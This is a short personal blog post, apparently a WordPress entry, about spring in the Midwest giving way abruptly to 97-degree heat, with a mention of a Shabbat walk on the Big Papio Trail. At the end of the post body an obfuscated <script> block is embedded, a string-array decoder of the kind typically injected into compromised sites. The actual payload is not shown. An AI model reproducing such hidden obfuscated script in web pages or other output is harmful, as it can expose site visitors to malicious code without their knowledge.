The trees had leaves, and most of them had full heads of hair, not little bits and pieces of foliage peeking through.\u00a0 The magnolias, dogwood, plums, crabapples, all bloomed.\u00a0 The lilacs were out.\u00a0 It was still coolish driving into work, and while it was a little hot for the 5-mile Shabbat walk along the Big Papio Trail, overall, still pleasant.<\/p>\n<p>Sunday night, Summer showed up.\u00a0 When I drove into work at 8:30, someone had forgotten to turn off the burner, and it was humid enough that I was almost to turn on the car, lest the air intake get flooded.\u00a0 Today: 97.\u00a0 I know, I know.\u00a0 I was also the one complaining that it took 2 weeks for the temperature to break freezing when I moved out here four months ago.\u00a0 No pleasing some people.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>So this is what Spring in the midwest is like.
